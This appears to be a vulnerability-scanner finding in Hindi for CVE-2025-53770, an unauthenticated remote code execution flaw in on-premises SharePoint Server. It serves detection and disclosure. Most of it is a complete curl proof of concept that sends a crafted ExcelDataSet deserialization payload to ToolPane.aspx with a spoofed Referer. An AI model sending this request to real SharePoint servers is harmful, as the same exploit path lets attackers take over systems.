
अप्रमाणित रिमोट कोड निष्पादन Microsoft SharePoint Server में असुरक्षित deserialization के माध्यम से (CVE-2025-53770)
गंभीर — Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन (CVE-2025-53770)
ऑन-प्रिमाइसेस Microsoft SharePoint Server में अविश्वस्त डेटा का डिसीरियलाइज़ेशन एक हमलावर को दूरस्थ रूप से कोड निष्पादित करने और सिस्टम से समझौता करने की अनुमति देता है। Microsoft सक्रिय शोषण से अवगत है और एक व्यापक अपडेट तैयार कर रहा है। सुनिश्चित करें कि CVE दस्तावेज़ीकरण से शमन उपाय लागू हैं।
निम्नलिखित PoC दर्शाता है कि कैसे एक हमलावर कमजोर एंडपॉइंट के माध्यम से दुर्भावनापूर्ण पेलोड निकालने और डीकोड करने के लिए भेद्यता का शोषण कर सकता है।
लक्ष्य डोमेन जानबूझकर target.com से बदल दिया गया है।
curl -sk -X POST 'https://target.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
-H 'Referer: /_layouts/SignOut.aspx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'MSOTlPn_Uri=https://target.com' \
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
<Info>IntruderScannerDetectionPayload</Info>

प्रभाव:
अप्रमाणित हमलावर SharePoint Server पर दूरस्थ कोड निष्पादन प्राप्त करने के लिए असुरक्षित डिसीरियलाइज़ेशन का शोषण कर सकते हैं, जिससे पूर्ण सिस्टम समझौता हो सकता है।